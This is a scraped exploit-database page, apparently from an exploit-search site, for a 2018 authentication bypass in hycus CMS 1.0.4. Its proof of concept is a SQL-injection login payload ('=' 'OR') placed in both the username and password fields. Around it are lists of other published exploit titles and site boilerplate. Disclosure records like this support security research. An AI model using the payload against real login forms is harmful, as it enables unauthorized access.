Become a patron and gain access to the dashboard, Schedule scans, API and Search patron

"hycus CMS 1.0.4 - Authentication Bypass"

Author

Exploit author

"Berk Dusunur"

Platform

Exploit platform

php

Release date

Exploit published date

2018-06-28

                
                    
                         Download file
                    
                
            
# Exploit Title: hycus Content Management System v1.0.4 Login Page Bypass
# Google Dork:N/A
# Date: 28.06.2018
# Exploit Author: Berk Dusunur
# Vendor Homepage: http://www.hycus.com/
# Software Link: http://demosite.center/hycus/
# Version: 1.0.4
# Tested on: Pardus / Debian Web Server
# CVE : N/A

#Proof Of Concept

use login bypass payload for username=   '=' 'OR'   for password=   '=' 'OR'

Release Date	Title	Type	Platform	Author
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"ILIAS Learning Management System 4.3 - SSRF"	webapps	multiple	Dot
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Microsoft Windows - Win32k Elevation of Privilege"	local	windows	nu11secur1ty
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"
2020-12-02	"Pharmacy Store Management System 1.0 - 'id' SQL Injection"	webapps	php	"Aydın Baran Ertemir"

Release Date	Title	Type	Platform	Author
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"WordPress Plugin Wp-FileManager 6.8 - RCE"	webapps	php	"Mansoor R"
2020-12-02	"WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution"	webapps	php	zetc0de
2020-12-02	"WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting"	webapps	php	"Hemant Patidar"
2020-12-02	"Simple College Website 1.0 - 'page' Local File Inclusion"	webapps	php	Mosaaed
2020-12-02	"Car Rental Management System 1.0 - SQL Injection / Local File include"	webapps	php	Mosaaed
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Pharmacy Store Management System 1.0 - 'id' SQL Injection"	webapps	php	"Aydın Baran Ertemir"
2020-12-02	"WonderCMS 3.1.3 - Authenticated Remote Code Execution"	webapps	php	zetc0de
2020-12-01	"Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS"	webapps	php	yunaranyancat

Release Date	Title	Type	Platform	Author
2020-05-28	"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"	webapps	multiple	"Berk Dusunur"
2020-05-28	"Online-Exam-System 2015 - 'fid' SQL Injection"	webapps	php	"Berk Dusunur"
2020-01-29	"Liferay CE Portal 6.0.2 - Remote Command Execution"	webapps	java	"Berk Dusunur"
2018-10-29	"Grapixel New Media 2 - 'pageref' SQL Injection"	webapps	php	"Berk Dusunur"
2018-08-23	"PCViewer vt1000 - Directory Traversal"	webapps	windows	"Berk Dusunur"
2018-07-23	"Synology DiskStation Manager 4.1 - Directory Traversal"	webapps	linux	"Berk Dusunur"
2018-07-23	"NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution"	webapps	hardware	"Berk Dusunur"
2018-07-22	"GeoVision GV-SNVR0811 - Directory Traversal"	webapps	hardware	"Berk Dusunur"
2018-07-16	"WordPress Plugin Job Manager 4.1.0 - Cross-Site Scripting"	webapps	php	"Berk Dusunur"
2018-07-10	"WolfSight CMS 3.2 - SQL Injection"	webapps	php	"Berk Dusunur"
2018-06-28	"hycus CMS 1.0.4 - Authentication Bypass"	webapps	php	"Berk Dusunur"
2018-06-22	"phpLDAPadmin 1.2.2 - 'server_id' LDAP Injection (Username)"	webapps	php	"Berk Dusunur"
2018-06-20	"NewMark CMS 2.1 - 'sec_id' SQL Injection"	webapps	linux	"Berk Dusunur"
2018-06-18	"Redatam Web Server < 7 - Directory Traversal"	webapps	windows	"Berk Dusunur"
2018-05-21	"Zenar Content Management System - Cross-Site Scripting"	webapps	php	"Berk Dusunur"
2018-05-18	"Monstra CMS < 3.0.4 - Cross-Site Scripting (2)"	webapps	php	"Berk Dusunur"
2018-03-26	"Acrolinx Server < 5.2.5 - Directory Traversal"	remote	windows	"Berk Dusunur"

import requests

response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/44954/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Search for hundreds of thousands of exploits

"hycus CMS 1.0.4 - Authentication Bypass"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.